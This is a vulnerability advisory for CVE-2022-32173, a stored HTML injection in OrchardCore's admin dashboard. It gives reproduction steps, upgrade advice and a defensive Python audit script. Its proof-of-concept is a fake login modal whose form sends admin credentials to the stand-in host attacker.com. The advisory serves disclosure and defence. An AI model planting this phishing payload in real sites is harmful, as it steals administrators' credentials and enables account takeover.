Headline
CVE-2022-32173: Mend Vulnerability Database
Overview
OrchardCore versions rc1-11259 to v1.2.2 are vulnerable to HTML injection, which allows an authenticated user with an editor security role to inject a persistent HTML modal dialog component into the dashboard that will affect admin users.
Details
Once an admin accesses the dashboard, the injected modal dialog is presented (preventing access to any other element on the page) and waits for input. Once the form is submitted, the admin is redirected to a malicious host and the attacker receives the confidential data (the user’s credentials, for instance).
PoC Details
1. Log in as an admin, navigate to security roles, and then edit the “Editor” role.
2. Then, enable the “Manage the Admin Dashboard” privilege.
3. Create a user with an “Editor” role and log out.
4. Log in with the new user.
5. Once logged in, navigate to the Admin’s page (“/Admin” route).
6. Press on “Manage Dashboard” and edit a certain Widget (with HTML editing capabilities).
7. Press on “<>” and add the following HTML code (see the “PoC Code” section).
8. Click on “Publish”.
You will see that you are brought to the “/Admin” page and cannot press on any other element. Type in non-confidential data and press “Login”. You will see that you are redirected to the attacker's site, and the submitted credentials are sent to the attacker.
9. Now, let’s log in as an admin (since you can’t log out, route to “/login”).
10. Navigate to the Admin’s page (“/Admin” route). You will see the Modal dialog appear.
PoC Code
<div class="modal show d-block">
  <div class="modal-dialog">
    <div class="modal-content">
      <div class="modal-header">
        <h3 class="page-title">Please Log In</h3>
      </div>
      <div class="modal-body">
        <form class="new-wiki-page" action="http://attacker.com/">
          <div class="form-group">
            <label for="username"><span>Username</span></label>
            <input type="text" name="username" id="username" class="form-control">
            <label for="password"><span>Password</span></label>
            <input type="password" name="password" id="password" class="form-control">
          </div>
          <div class="form-actions"><button name="button" type="submit" class="btn btn-success">Login</button></div>
        </form>
      </div>
    </div>
  </div>
</div>
Affected Environments
OrchardCore versions rc1-11259 through v1.2.2
Prevention
Upgrade to OrchardCore version v1.4.0
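Alongside the upgrade, stored dashboard widget HTML can be audited for markup shaped like the PoC above. The following is an added example, not code from the advisory or from OrchardCore: the function and class names, the site host `cms.example.test`, and both sample strings are assumptions constructed here, and it expects widget HTML bodies that have already been exported from the CMS.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed samples: a condensed form of the PoC markup and a harmless widget.
POC_SAMPLE = (
    '<div class="modal show d-block"><div class="modal-dialog">'
    '<form class="new-wiki-page" action="http://attacker.com/">'
    '<input type="text" name="username">'
    '<input type="password" name="password">'
    '<button type="submit">Login</button></form></div></div>'
)
BENIGN_SAMPLE = '<div class="card"><form action="/search"><input type="text" name="q"></form></div>'


class WidgetHtmlAudit(HTMLParser):
    """Collects findings for login-prompt style markup in widget HTML."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []
        self._form_external = False  # True while inside a form posting off-site

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        classes = a.get("class", "").split()
        if tag == "form":
            host = (urlparse(a.get("action", "")).hostname or "").lower()
            # Relative actions have no host and therefore stay on the site.
            self._form_external = bool(host) and host != self.site_host
            if self._form_external:
                self.findings.append(f"form posts to external host {host}")
        elif tag == "input" and a.get("type", "").lower() == "password":
            where = "inside" if self._form_external else "outside"
            self.findings.append(f"password input {where} an off-site form")
        # Bootstrap modal forced visible by classes alone, as in the PoC.
        if "modal" in classes and ("show" in classes or "d-block" in classes):
            self.findings.append("modal forced visible via CSS classes")

    def handle_endtag(self, tag):
        if tag == "form":
            self._form_external = False


def audit_widget_html(html, site_host):
    parser = WidgetHtmlAudit(site_host)
    parser.feed(html)
    parser.close()
    return parser.findings
```

Any finding on a dashboard widget is worth a manual review of who last edited that widget and which roles hold the “Manage the Admin Dashboard” privilege.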
Related news
OrchardCore versions starting with 1.0.0-rc1-11259 and prior to 1.4.0 are vulnerable to HTML injection. The vulnerability allows an authenticated user with an editor security role to inject a persistent HTML modal dialog component into the dashboard that will affect admin users. Version 1.4.0 contains a patch.